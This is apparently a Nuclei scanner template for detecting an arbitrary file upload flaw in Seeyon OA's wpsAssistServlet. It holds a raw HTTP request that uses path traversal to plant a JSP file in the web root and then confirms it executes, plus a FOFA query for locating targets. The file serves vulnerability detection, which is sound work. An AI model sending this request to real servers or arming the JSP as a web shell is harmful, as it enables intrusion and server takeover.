id: seeyon-oa-sp2-file-upload info: name: Seeyon OA wpsAssistServlet - Arbitrary File Upload author: SleepingBag945 severity: critical description: | There is an arbitrary file upload vulnerability in the Seeyon OA wpsAssistServlet interface. Through the vulnerability, an attacker can send a specific request packet to upload malicious files and obtain server permissions. reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 2 fofa-query: app="致远互联-OA" && title="V8.0SP2" tags: seeyon,oa,file-upload,intrusive variables: filename: "{{rand_base(6)}}" string: "{{rand_base(5)}}" http: - raw: - | POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b Accept-Encoding: gzip --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls" Content-Type: application/vnd.ms-excel <% out.println("{{string}}");%> --59229605f98b8cf290a7b8908b34616b-- - | GET /{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_1 words: - '"success":' - type: word part: body_2 words: - '{{string}}' - type: status status: - 200 # digest: 4b0a00483046022100bb099968e2f223d05e340ccaecf1d41d3174e41512550016ca487cd9b5ba35c8022100e64ed9a10f25662dcdce8bbfe6ad0c4dd52b27c8adff3c31bb0ef14a0f673eb2:922c64590222798bb761d5b6d8e72950